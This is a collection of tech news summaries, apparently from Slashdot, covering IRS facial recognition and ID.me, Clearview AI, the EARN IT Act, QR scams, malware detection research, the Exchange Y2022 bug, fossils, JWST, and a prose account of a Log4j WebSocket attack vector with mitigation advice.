An anonymous reader quotes a report from FedScoop: The Internal Revenue Service has committed to Login.gov as a user authentication tool after earlier this month agreeing to abandon the use of a commercial tool that featured third-party facial recognition technology. In a statement on Monday, the Treasury Department said it is working with the General Services Administration to achieve the "security standards and scale" required to adopt the platform.

It comes after IRS earlier this month announced a plan to move away from using a third-party service for facial recognition to authenticate taxpayers creating new online accounts. It was forced to reject the technology following revelations that contractor ID.me uses powerful one-to-many facial recognition technology. "While this short-term solution is in place for this year's filing season, the IRS will work closely with partners across government to roll out login.gov as an authentication tool," IRS said.

While Login.gov is not expected to be ready in time for use by taxpayers during the current tax season, users are now able to sign up for IRS online accounts without the use of any biometric data. Any previously collected biometric data will also be deleted over the next few weeks, according to IRS. Despite the move to Login.gov, taxpayers will still have the option to verify their identity automatically through ID.me's tool if they choose. New requirements are in place to ensure images provided are deleted for the account being created. The IRS said in a statement: "Taxpayers will have the option of verifying their identity during a live, virtual interview with agents; no biometric data -- including facial recognition -- will be required if taxpayers choose to authenticate their identity through a virtual interview."

tThe Washington Post reports: Clearview AI is telling investors it is on track to have 100 billion facial photos in its database within a year, enough to ensure "almost everyone in the world will be identifiable," according to a financial presentation from December obtained by The Washington Post.

Those images — equivalent to 14 photos for each of the 7 billion people on Earth — would help power a surveillance system that has been used for arrests and criminal investigations by thousands of law enforcement and government agencies around the world. And the company wants to expand beyond scanning faces for the police, saying in the presentation that it could monitor "gig economy" workers and is researching a number of new technologies that could identify someone based on how they walk, detect their location from a photo or scan their fingerprints from afar.

The 55-page "pitch deck," the contents of which have not been reported previously, reveals surprising details about how the company, whose work already is controversial, is positioning itself for a major expansion, funded in large part by government contracts and the taxpayers the system would be used to monitor. The document was made for fundraising purposes, and it is unclear how realistic its goals might be. The company said that its "index of faces" has grown from 3 billion images to more than 10 billion since early 2020 and that its data collection system now ingests 1.5 billion images a month.

With $50 million from investors, the company said, it could bulk up its data collection powers to 100 billion photos, build new products, expand its international sales team and pay more toward lobbying government policymakers to "develop favorable regulation."
The article notes that major tech companies like Amazon, Google, IBM and Microsoft have all limited or ended their own sales of facial recognition technology — adding that Clearview's presentation simple describes this as a major business opportunity for themselves.

In addition, the Post reports Clearview's presentation brags "that its product is even more comprehensive than systems in use in China, because its 'facial database' is connected to 'public source metadata' and 'social linkage' information."

The pandemic has accelerated the usage of QR codes, taking them from niche status to an essential tool for businesses and marketers. From a report: Look no further than Sunday's Super Bowl commercial of nothing but a floating QR code sending users to the website of Coinbase. [...] Law enforcement officials are sounding the alarm about the risks. The FBI issued an alert in January warning Americans that cybercriminals "are tampering with QR codes to redirect victims to malicious sites that steal login and financial information." If you're scanning a physical code, make sure it hasn't been tampered with. For example, watch out for "a sticker placed on top of the original code," the FBI advises.

An anonymous reader shares a report: Google's Inbox experiment was a glorious thing while it lasted. Launched as an invitation-only service in 2014, it was the company's next-gen email client. Because it was so good, it's no surprise Google shut it down in 2019. Thankfully, though, a group of ex-Google/Firebase employees is now resurrecting the Inbox experience -- with a bit of the Slack user experience mixed in, too.

As Lee told me, the team took two important inspirations from Inbox. "One is the idea that you should work with your email in groups," he said, referring to Inbox's ability to bundle emails by topic. "As the volume of email grows in your inbox, it becomes impractical just to page through every single email. Even if you have all the keyboard shortcuts and your app is super optimized, just scanning through all that stuff takes a long time." While you want to know about automated emails like calendar notifications for example, chances are you've already accepted those invites in your calendar, for example, so marking all those as read or snooze them for later with a couple of clicks saves a lot of time. In addition, the team also built Shortwave with the idea that your inbox, whether you like it or not, is a to-do list.

An anonymous reader quotes a report from Motherboard: The most insufferable part of every Super Bowl Sunday has historically, without fail, been the ads. This year was no exception, with an unrelenting barrage of ads trying to manifest the metaverse, convince viewers they're missing out on crypto, and lure new blood to online and physical casinos. Results were mixed. Coinbase, in one ad named WAGMI ("we're all going to make it"), crafted an advertisement that bounced a QR code around the screen, changing colors each time it hit the edge like an old-school DVD menu. Scanning the QR codewhich immediately forfeits your right to enter heaventakes the user to this page, where Coinbase offers $15 in Bitcoin for signing up as well as a chance to enter a contest to win one of three prizes for $1 million worth of Bitcoin. The linked webpage went down almost immediately thanks to the increased traffic from the ad, and ridicule at the idea of paying millions of dollars to send millions of viewers to a down site poured in from around the web.

To Coinbase, though, the ad was a success. In a blog post congratulating itself on the advertisement and interviewing Coinbase Chief Marketing Officer Kate Rouch about why the ad was so good, the company revealed it saw "20M+ hits on our landing page in one minute" which "led to us temporarily throttling our systems." Chief executive Brian Armstrong took to Twitter to gloat about the ad: ranked #1 by AdWeek and peaking at #2 in the Apple App Store, just ahead of apps for the Pepsi Super Bowl Halftime Show and the NFL. As it turns out, putting up nothing but a QR code in the middle of a widely-watched sports event and offering free money as well as a chance to win $3 million is a good way to build interest in your app. When Motherboard reached out to Coinbase about the ad, the company directed Motherboard to Rouch's blog post and reiterated its main points.

While taking a victory lap for the apparent success of its ad, Coinbase took the time to explain why this is definitely not at all like the dotcom bubble, which many critics have said is an apt comparison for Sunday's ads. "There have been a lot of comparisons to the dot.com era and speculation that many of the crypto companies advertising in this year's Super Bowl will inevitably fail," said Rouch in Coinbase's blog post. "We don't think about it that way and judging from the early response we've seen, Super Bowl viewers don't either." Rouch insisted that the sheer number of crypto ads in the Super Bowl was "yet another signal that crypto is bursting into the mainstream, and at the center of the cultural zeitgeist." Further reading: This Year's Super Bowl Broadcast May Seem 'Crypto-Happy'. But the NFL Isn't

America's Internal Revenue service abandoned plans to make face-scanning mandatory for access to your tax records.

Unfortunately, before this change of heart the IRS had already directed 7 million Americans to facial recognition vendor ID.me, reports the Washington Post. Now the chair of the House Oversight Committee is urging IRS Commissioner Charles Rettig to instruct ID.me to destroy the biometric data and ensure the data isn't used for "unapproved or unauthorized purposes." "Those Americans' highly personal information may continue to be held by a third party outside of the IRS's direct control — increasing the potential for exposure due to bad actors and other cybersecurity incidents," [head of the committee] . Maloney wrote.... ID.me said on Wednesday that it would drop the facial recognition requirement in its software, which is used by 30 states and 10 federal agencies. The company also told The Washington Post that effective March 1, anyone would be able to delete their selfie or photo data....

The letter follows years of controversy over the government's expanding use of facial recognition software, despite warnings from the General Services Administration that the face-scanning technology has too many problems to justify its use.... There is no federal law regulating how facial recognition can be used or how it should be secured....

Maloney also writes that 13 percent of ID.me users since June had struggled to use the software and were referred to customer service, where representatives would attempt to verify their identities over video chat. The letter says this underscores the "widespread issues related to the use of the nascent facial recognition technology."
In fact, the Verge reports that "Internal documents and former ID.me employees say the company was beset by disorganization and staffing shortages throughout 2021, as shortcomings in the automated systems created tensions among the company's workforce, particularly the human verification workers who have to step in when the algorithms fail." Current and former employees who spoke to The Verge paint a picture of a company described as being in "permanent crisis mode," changing policies rapidly to keep up with fluctuating demand for its services and fight a slew of negative press. In particular, they say a lack of human review capacity has been a chokepoint for the company, leading to stress, pressure, and a failure to meet quality standards. It's an unexpected challenge for a biometrics system that's usually seen as automatic, pointing to the often-ignored workers needed to support automated systems at scale.

When the automated systems fail — ID.me says roughly 10 percent of users will need video chat assistance — it's workers and subjects who are left to manage the consequences.... To keep up with demand, the company added 1,300 new employees between January and September 2021, including 500 to be based in a new office in Tampa, Florida, dedicated to customer support. But as adoption increased, so did complaints. A Vice report found dozens of complaints from applicants who said they had been locked out of unemployment benefits when ID.me's verification service had failed to identify them. When the automated system failed, applicants often faced long wait times to reach human reviewers, according to the report — wait times that became even more burdensome and difficult to navigate for people without access to reliable internet connections....

Many staff were unhappy about the end of work-from-home policies, which were being phased out at the company at the same time as first the delta and then omicron variants hit the US. As in-office staffing levels rose, more ID.me employees began to contract COVID at work, sources said, in some cases taking whole teams offline at once.
One Id.me employee complained to the Verge that "In terms of worker treatment, it's like the Amazon of identity protection."

The article also notes that an ID.me video chat agent was terminated after engaging in "inappropriate conduct," and while the company added new procedures to prevent this, "sources said that these quality checks have begun to fall by the wayside under the pressure of clearing through the backlog of video verification requests."

An anonymous reader quotes a report from Gizmodo: Clearview AI, the shady face recognition firm which claims to have landed contracts with federal, state, and local cops across the country, has landed a roughly $50,000 deal with the U.S. military for augmented reality glasses. First flagged by Tech Inquiry's Jack Poulson, Air Force procurement documents show that it awarded a $49,847 contract to Clearview AI for the purposes of "protecting airfields with augmented reality facial recognition; glasses." The contract is designated as part of the Small Business Innovation Research (SBIR) program, meaning that Clearview's contract is to determine for the Air Force whether such applications are feasible.

Bryan Ripple, a media lead at the Air Force Research Laboratory Public Affairs, told Gizmodo via email that Clearview will conduct a three-month study under which "no glasses or units are being delivered under contract," nor are any prototypes. Clearview, he wrote, stipulated "that security personnel are vulnerable while their hands are occupied with scanners and ID cards" and AR goggles would allow them to "remain hands-free and ready during this timeframe." "Clearview AI's Augmented Reality (AR) Glasses perform facial recognition scanning to vet backgrounds and restrict unauthorized individuals from entering bases and flightlines," Ripple wrote. "This 100% hands-free identity verification wearable device allows Defenders to keep their weapons at the ready, increase standoff and social distance, and confirm authorized base access using rapid and accurate facial biometrics while keeping threats distant. The results are improved safety at entry control points and for bases, faster identity verification without manual ID card checks, and cost savings by replacing the need for large permanent camera installations."

In a promotional document shared by the Air Force, Clearview argued that in the time it takes to scan an ID card at the entry point to a military facility, "A criminal or terrorist can pull a gun, knife, or weapon during this brief but critical moment, kill the Defender, and access the base." They argued the AR glasses would increase "standoff distance," save guards time while vetting high volumes of traffic and allow them to maintain distance from anyone contagious with diseases.

A group of lawmakers have re-introduced the EARN IT Act, an incredibly unpopular bill from 2020 that "would pave the way for a massive new surveillance system, run by private companies, that would roll back some of the most important privacy and security features in technology used by people around the globe," writes Joe Mullin via the Electronic Frontier Foundation. "It's a framework for private actors to scan every message sent online and report violations to law enforcement. And it might not stop there. The EARN IT Act could ensure that anything hosted online -- backups, websites, cloud photos, and more -- is scanned." From the report: The bill empowers every U.S. state or territory to create sweeping new Internet regulations, by stripping away the critical legal protections for websites and apps that currently prevent such a free-for-all -- specifically, Section 230. The states will be allowed to pass whatever type of law they want to hold private companies liable, as long as they somehow relate their new rules to online child abuse. The goal is to get states to pass laws that will punish companies when they deploy end-to-end encryption, or offer other encrypted services. This includes messaging services like WhatsApp, Signal, and iMessage, as well as web hosts like Amazon Web Services. [...]

Separately, the bill creates a 19-person federal commission, dominated by law enforcement agencies, which will lay out voluntary "best practices" for attacking the problem of online child abuse. Regardless of whether state legislatures take their lead from that commission, or from the bill's sponsors themselves, we know where the road will end. Online service providers, even the smallest ones, will be compelled to scan user content, with government-approved software like PhotoDNA. If EARN IT supporters succeed in getting large platforms like Cloudflare and Amazon Web Services to scan, they might not even need to compel smaller websites -- the government will already have access to the user data, through the platform. [...] Senators supporting the EARN IT Act say they need new tools to prosecute cases over child sexual abuse material, or CSAM. But the methods proposed by EARN IT take aim at the security and privacy of everything hosted on the Internet.

The Senators supporting the bill have said that their mass surveillance plans are somehow magically compatible with end-to-end encryption. That's completely false, no matter whether it's called "client side scanning" or another misleading new phrase. The EARN IT Act doesn't target Big Tech. It targets every individual internet user, treating us all as potential criminals who deserve to have every single message, photograph, and document scanned and checked against a government database. Since direct government surveillance would be blatantly unconstitutional and provoke public outrage, EARN IT uses tech companies -- from the largest ones to the very smallest ones -- as its tools. The strategy is to get private companies to do the dirty work of mass surveillance.

America's Internal Revenue Service created an uproar with early plans to require live-video-feed selfies to verify identities for online tax services (via an outside company called ID.me).

But Wired points out that more than 20 U.S. federal agencies are already using a digital identification system (named Login.gov and built on services from LexisNexis) that "can use selfies for account verification."

It's run by America's General Services Administration, or GSA.... The GSA's director of technology transformation services Dave Zvenyach says facial recognition is being tested for fairness and accessibility and not yet used when people access government services through Login.gov. The GSA's administrator said last year that 30 million citizens have Login.gov accounts and that it expects the number to grow significantly as more agencies adopt the system.

"ID.me is supplying something many governments ask for and require companies to do," says Elizabeth Goodman, who previously worked on Login.gov and is now senior director of design at federal contractor A1M Solutions. Countries including the UK, New Zealand, and Denmark use similar processes to ID.me's to establish digital identities used to access government services. Many international security standards are broadly in line with those of the U.S., written by the National Institute of Standards and Technology (NIST).

Goodman says that such programs need to provide offline options such as visiting a post office for people unable or unwilling to use phone apps or internet services....
In fact, Wired argues that in many cases, a selfie or biometric data is virtually required by U.S. federal security guidelines from 2017: NIST's 2017 standard says that access to systems that can leak sensitive data or harm public programs should require verifying a person's identity by comparing them to a photo — either remotely or in person — or using biometrics such as a fingerprint scanner. It says that a remote check can be done either by video with a trained agent, or using software that checks for an ID's authenticity and the "liveness" of a person's photo or video.... California's Employment Development Department said that ID.me blocked more than 350,000 fraudulent claims in the last three months of 2020. But the state auditor said an estimated 20 percent of legitimate claimants were unable to verify their identities with ID.me.

Caitlin Seeley George, director of campaigns and operations with nonprofit Fight for the Future, says ID.me uses the specter of fraud to sell technology that locks out vulnerable people and creates a stockpile of highly sensitive data that itself will be targeted by criminals. ...

Last week America's Internal Revenue Service announced a live-video-feed verification of taxpayer's faces would be required by this summer access online tax service. But now the Washington Post reports that "complaints of confusing instructions and long wait times to complete the sign-up have caused an unknown number to abandon the process in frustration."

"The $86 million ID.me contract with the IRS also has alarmed researchers and privacy advocates who say they worry about how Americans' facial images and personal data will be safeguarded in the years to come." There is no federal law regulating how the data can be used or shared. While the IRS couldn't say what percentage of taxpayers use the agency's website, internal data show it is one of the federal government's most-viewed websites, with more than 1.9 billion visits last year. The partnership with ID.me has drawn anger from some members of Congress, including Sen. Ron Wyden (D-Ore.), who tweeted that he was "very disturbed" by the plan and would push the IRS for "greater transparency." Rep. Ted Lieu (D-Calif.) called it "a very, very bad idea by the IRS" that would "further weaken Americans' privacy." The Senate Finance Committee is working to schedule briefings with the IRS and ID.me on the issue, a committee aide said.... "No one should be forced to submit to facial recognition as a condition of accessing essential government services," Wyden said in a separate statement. "I'm continuing to seek more information about ID.me and other identity verification systems being used by federal agencies."

A Treasury official said Friday that the department was "looking into" alternatives to ID.me, saying Treasury and the IRS always are interested in improving "taxpayers experience...."

About 70 million Americans who have filed for unemployment insurance, pandemic assistance grants, child tax credit payments or other services already have been scanned by the McLean, Va.-based company, which says its client list includes 540 companies; 30 states, including California, Florida, New York and Texas; and 10 federal agencies, including Social Security, Labor and Veterans Affairs.... Equifax, the credit-reporting company that previously confirmed taxpayers' data for the IRS, had its $7 million contract suspended in 2017 after hackers exposed the personal information of 148 million people...

[ID.me] says 9 of 10 applicants can verify their identity through a self-service face scan in five minutes or less. Anyone who hits a snag is funneled into the backup video-chat verification process...But some who have tried to verify their identities through ID.me for other purposes have reported agonizing delays: cryptic glitches in Colorado, website errors in Arizona, five-hour waits in North Carolina, days-long waits in California and weeks-long benefit delays in New York. The security blogger Brian Krebs wrote last week that he faced a three-hour wait trying to confirm his IRS account, three months before the tax-filing deadline.... The company said it intends to expand its workforce beyond the 966 agents who now handle video-chat verification for the entire country. It has also opened hundreds of in-person identity-verification centers — replicating, in essence, what government offices have done for decades.
The article also points out that advertising is also a key part of ID.me's operation, with people signing up through their web site asked if they want to subscribe to "offers and discounts" — though the company stresses people do have to opt in. And in addition, the article adds, "If a person is using ID.me to confirm their identity with a government agency, the company will not use that verification information for 'marketing or promotional purposes,' the company's privacy policy says."

But a senior counsel at the Electronic Privacy Information Center complained to the Post that "We haven't even gone the step of putting regulations in place and deciding if facial recognition should even be used like this. We're just skipping right to the use of a technology that has clearly been shown to be dangerous and has issues with accuracy, disproportionate impact, privacy and civil liberties."

A spokesperson for the U.S. Treasury Department also told Bloomberg News "that any taxpayer who does not want to use ID.me can opt against filing his or her taxes online." "We believe in the importance of protecting the privacy of taxpayers, while also ensuring criminals are not able to gain access to taxpayer accounts," LaManna added, arguing that it's been "impossible" for the IRS to develop its own cutting-edge identification program because of "the lack of funding for IRS modernization."

The UK government's cyber-security agency plans to release Nmap scripts in order to help system administrators in scanning their networks for unpatched or vulnerable devices. From a report: The new project, titled Scanning Made Easy (SME), will be managed by the UK National Cyber Security Centre (NCSC) and is a joint effort with Industry 100 (i100), a collaboration between the NCSC and the UK private sector. "When a software vulnerability is disclosed, it is often easier to find proof-of-concept code to exploit it, than it is to find tools that will help defend your network," the NCSC said yesterday. "To make matters worse, even when there is a scanning script available, it can be difficult to know if it is safe to run, let alone whether it returns valid scan results."

The NCSC said that the SME project was created to solve this problem by having some of the UK's leading security experts, from both the government and public sector, either create or review scripts that can be used to scan internal networks. Approved scripts will be made available via the NCSC's SME GitHub project page, and the agency said it's also taking submissions from the security community as well. Only scripts for the Nmap network scanning app will be made available through this project, the NCSC said on Monday.

First, Amazon competed with malls. Now, it's moving inside one. From a report: The online retailing giant said Thursday that it plans to open a clothing store in a Southern California mall later this year. It's the latest foray into brick-and-mortar for Amazon, which already sells more than 10% of all clothes in the U.S. The store, which will sell women's and men's clothing as well as shoes and other accessories, will open at Americana at Brand, a mall in Glendale, California. The entry into malls could become another threat to traditional clothing sellers because of the data and shopper insights Amazon may gain, experts say.

Amazon says its algorithms will spit out real-time recommendations as shoppers keep scanning items that they see. Shoppers can also fill out an online survey of their preferences for style and fit. The store will be about 30,000 square feet, similar in size to a Kohl's, but about one-third the size of other department stores like Macy's. However, it will offer more than double the number of styles as traditional stores do because only one of each piece of clothing will be on display, with the rest in the back room. Items are chosen by Amazon curators who also use feedback provided by millions of customers shopping on Amazon.com.

An anonymous reader quotes a report from Gizmodo: A team of researchers at France's Research Institute of Computer Science and Random Systems created an anti-malware system centered around a Raspberry Pi that scans devices for electromagnetic waves. As reported by Tom's Hardware, the security device uses an oscilloscope (Picoscope 6407) and H-Field probe connected to a Raspberry Pi 2B to pick up abnormalities in specific electromagnetic waves emitted by computers that are under attack, a technique the researchers say is used to "obtain precise knowledge about malware type and identity."

The detection system then relies on Convolution Neural Networks (CNN) to determine whether the data gathered indicates the presence of a threat. Using this technique, researchers claims they could record 100,000 measurement traces from IoT devices infected by genuine malware samples, and predicted three generic and one benign malware class with an accuracy as high as 99.82%. Best of all, no software is needed and the device you're scanning doesn't need to be manipulated in any way. As such, bad actors won't be successful with their attempts to conceal malicious code from malware detection software using obfuscation techniques. "Our method does not require any modification on the target device. Thus, it can be deployed independently from the resources available without any overhead. Moreover, our approach has the advantage that it can hardly be detected and evaded by the malware authors," researchers wrote in the paper.

Slashdot reader BoogieChile writes: Details of an important new fossil site has just been published in the first Science Advances journal for the new year. McGraths Flat, in New South Wales, Australia, was once the location of this oxbow lake in a mesic rainforest. Today, superb examples of fossilised animals and plants from the Miocene epoch have been recovered, showing incredible detail, including melanosomes preserved in feathers of birds and the eyes of fossilised fish

"The discovery of melanosomes — subcellular organelles that store the melanin pigment — allows us to reconstruct the colour pattern of birds and fishes that once lived at McGraths Flat," said Dr Michael Frese of the University of Canberra, one of the team's leaders. "Interestingly, the colour itself is not preserved, but by comparing the size, shape and stacking pattern of the melanosomes in our fossils with melanosomes in extant specimens, we can often reconstruct colour and/or colour patterns.
"Over the last three years a team of researchers has been secretly excavating the site, discovering thousands of specimens including rainforest plants, insects, spiders, fish and a bird feather," announced the University of New South Wales: "The fossils we have found prove that the area was once a temperate, mesic rainforest and that life was rich and abundant here in the Central Tablelands," said UNSW Sydney palaeontologist Dr Matthew McCurry [one of the team's leaders]. "Many of the fossils that we are finding are new to science and include trapdoor spiders, giant cicadas, wasps and a variety of fish.

"Until now it has been difficult to tell what these ancient ecosystems were like, but the level of preservation at this new fossil site means that even small fragile organisms like insects turned into well-preserved fossils."

Associate Professor Michael Frese, who imaged the fossils using stacking microphotography and a scanning electron microscope, said that the fossils from McGraths Flat show an incredibly detailed preservation. "Using electron microscopy, I can image individual cells of plants and animals and sometimes even very small subcellular structures," Dr Frese said. "The fossils also preserve evidence of interactions between species. For instance, we have fish stomach contents preserved in the fish, meaning that we can figure out what they were eating. We have also found examples of pollen preserved on the bodies of insects so we can tell which species were pollinating which plants."

Kalper (Slashdot reader #57,281) shares news from Bleeping Computer: Microsoft Exchange on-premise servers cannot deliver email starting on January 1st, 2022, due to a "Year 2022" bug in the FIP-FS anti-malware scanning engine.

Starting with Exchange Server 2013, Microsoft enabled the FIP-FS anti-spam and anti-malware scanning engine by default to protect users from malicious email. According to numerous reports from Microsoft Exchange admins worldwide, a bug in the FIP-FS engine is blocking email delivery with on-premise servers starting at midnight on January 1st, 2022.

Security researcher and Exchange admin Joseph Roosen said that this is caused by Microsoft using a signed int32 variable to store the value of a date, which has a maximum value of 2,147,483,647. However, dates in 2022 have a minimum value of 2,201,010,001 or larger, which is greater than the maximum value that can be stored in the signed int32 variable, causing the scanning engine to fail and not release mail for delivery. When this bug is triggered, an 1106 error will appear in the Exchange Server's Event Log stating, "The FIP-FS Scan Process failed initialization. Error: 0x8004005. Error Details: Unspecified Error" or "Error Code: 0x80004005. Error Description: Can't convert "2201010001" to long." Microsoft will need to release an Exchange Server update that uses a larger variable to hold the date to officially fix this bug.

However, for on-premise Exchange Servers currently affected, admins have found that you can disable the FIP-FS scanning engine to allow email to start delivering again... Unfortunately, with this unofficial fix, delivered mail will no longer be scanned by Microsoft's scanning engine, leading to more malicious emails and spam getting through to users.

With his narrow chin, small nose and curly hair he physically resembles his father, said radiologist Sahar Saleem. Perhaps surprisingly for someone who lived about 3,500 years ago, he also has strikingly good teeth. From a report: Saleem is talking about the mummified body of the pharaoh Amenhotep I, a warrior king who has been something of an enigma in that he is one of the few royal mummies not to be unwrapped in modern times. Until now, that is. Saleem, a professor of radiology at the faculty of medicine at Cairo University, is part of a team which has successfully unwrapped Amenhotep I not physically but digitally. The results, using 3D computed tomography (CT) scanning technology, are unprecedented and fascinating. They provide details about his appearance and the lavishness of the jewellery he was buried with. "We show that Amenhotep I was approximately 35 years old when he died," Saleem said. âoeHe was approximately 169cm tall [5ft 6in], circumcised, and had good teeth. Within his wrappings, he wore 30 amulets and a unique golden girdle with gold beads. "Amenhotep I seems to have physically resembled his father ... he had a narrow chin, a small narrow nose, curly hair, and mildly protruding upper teeth."

An anonymous reader quotes a report from Popular Science: Imagine being able to see the components of a potentially dangerous situation in live 3D and in fine detail without even having to survey the area,' says Brian Goddin, from the Air Force Installation and Mission Support Center public affairs, in a video produced by the military. [...] Putting lidar on drones and on ground robots gives the military a way to map the interior of a building with a machine. With that lidar data transmitted to the computers in a command center, or even just the tablet of an operator sitting outside the building, a human can see what the robot sees, and direct the robot accordingly. (In the civilian world, lidar sensors are commonly used on self-driving cars as one tool for the vehicles to perceive the world around them.) Goddin's presentation, released online December 9, 2021, shows lidar mounted on Spot, the Boston Dynamics dog-shaped robot. Ghost Robotics Q-UGV machines, also dog-shaped and sensor-rich, have been used to patrol the perimeter of Tyndall AFB, making Spot the second breed (or brand) of robot dog to serve the needs of the base.

While all of this mapping at Tyndall is happening in the wake of Hurricane Michael, creating a virtual 3D model of the buildings as they stand can guide future repair. Such a virtual model is a useful tool for regular maintenance and repair, and it provides a record of a prior state should disaster strike again. Such techniques could also allow better investigations of failure after the fact. By comparing lidar scans of downed or wrecked craft to those before launch, and to surviving aircraft that made it back from a fight, the Air Force could understand how to better make more durable craft. Scanning a wrecked plane with lidar also lets rescue workers and recovery teams know if and how they should act to save pilots and passengers, suggested Javier Rodriguez, a technician stationed at Tyndall.

"We have LIFTOFF of the @NASAWebb Space Telescope!" NASA tweeted seven hours ago, sharing a 32-second video of the launch. "At 7:20am ET (12:20 UTC), the beginning of a new, exciting decade of science climbed to the sky," they wrote, adding that the telescope "will change our understanding of space as we know it."

The CBC reports: The world's largest and most powerful space telescope rocketed away Saturday on a high-stakes quest to behold light from the first stars and galaxies, and scour the universe for hints of life.

NASA's James Webb Space Telescope soared from French Guiana on South America's northeastern coast, riding a European Ariane rocket into the Christmas morning sky. "What an amazing Christmas present," said Thomas Zurbuchen, NASA's science mission chief.

The $10-billion US observatory hurtled toward its destination 1.6 million kilometres away, or more than four times beyond the moon. It will take a month to get there and another five months before its infrared eyes are ready to start scanning the cosmos. First, the telescope's enormous mirror and sunshield need to unfurl; they were folded origami-style to fit into the rocket's nose cone. Otherwise, the observatory won't be able to peer back in time 13.7 billion years as anticipated, within a mere 100 million years of the universe-forming Big Bang. NASA administrator Bill Nelson called the telescope a time machine that will provide "a better understanding of our universe and our place in it: who we are, what we are, the search that's eternal."

"We are going to discover incredible things that we never imagined," Nelson said following liftoff, speaking from Florida's Kennedy Space Center. But he cautioned: "There are still innumerable things that have to work and they have to work perfectly.... We know that in great reward there is great risk...."

"We have delivered a Christmas gift today for humanity," said Josef Aschbacher, the European Space Agency's director general....

Cheers and applause erupted in and outside Launch Control following the telescope's flawless launch...
Official online dashboards are now tracking its position. (And you can watch complete footage of the entire launch here.) "If all goes well, the sunshield will be opened three days after liftoff, taking at least five days to unfold and lock into place," the CBC points out. "Next, the mirror segments should open up like the leaves of a drop-leaf table, 12 days or so into the flight." In all, hundreds of release mechanisms need to work — perfectly — in order for the telescope to succeed. Such a complex series of actions is unprecedented — "like nothing we've done before," noted NASA program director Greg Robinson.
Thanks to Slashdot readers Dave Knott and hackertourist for sharing the news...

"While the lack of funding in open source is certainly a problem, could funding have prevented the Log4j vulnerabilities?" asks Mike Melanson's "This Week in Programming" column. "Would funding actually prevent similar vulnerabilities in the future...?"

Or is that an oversimplification? In a blog post for the Linux Foundation's Open Source Security Foundation (OpenSSF), Brian Behlendorf argued that open source foundations must work together to prevent the next Log4Shell scramble, outlining seven points that OSS foundations could do to mitigate security risks. Among those seven points — which include security scanning, outside audits, dependency tracking, test frameworks, organization-wide security teams, and requiring projects to remove old, vulnerable code — not once was funding mentioned. Rather, Behlendorf precedes these points by saying that "Too many organizations have failed to apply raised funds or set process standards to improve their security practices, and have unwisely tilted in favor of quantity over quality of code."

Behlendorf continues after his list of seven suggested acts with a section that boils everything down perfectly:

"None of the above practices is about paying developers more, or channeling funds directly from users of software to developers. Don't get me wrong, open source developers and the people who support them should be paid more and appreciated more in general. However, it would be an insult to most maintainers to suggest that if you'd just slipped more money into their pockets they would have written more secure code. At the same time, it's fair to say a tragedy-of-the-commons hits when every downstream user assumes that these practices are in place, being done and paid for by someone else."

Behlendorf does go on to make some points about funds and fundraising, but his point is less on the lack of funding than the allocation of those funds and how they need to be focused on things like paid audits and "providing resources to move critical projects or segments of code to memory-safe languages, or fund bounties for more tests."

Behlendorf says that, in the new year, the OpenSSF will be working to "raise the floor" for security in open source.

"The only way we do this effectively is to develop tools, guidance, and standards that make adoption by the open source community encouraged and practical rather than burdensome or bureaucratic," he wrote. "We will be working with and making grants to other open source projects and foundations to help them improve their security game."
Behlendorf was a founding member of the Apache Group, which later became the Apache Software Foundation.

So as a long-time member of the Open Source community, he calls the Log4j vulnerabilities "a humbling reminder of just how far we still have to go."

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants. Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. "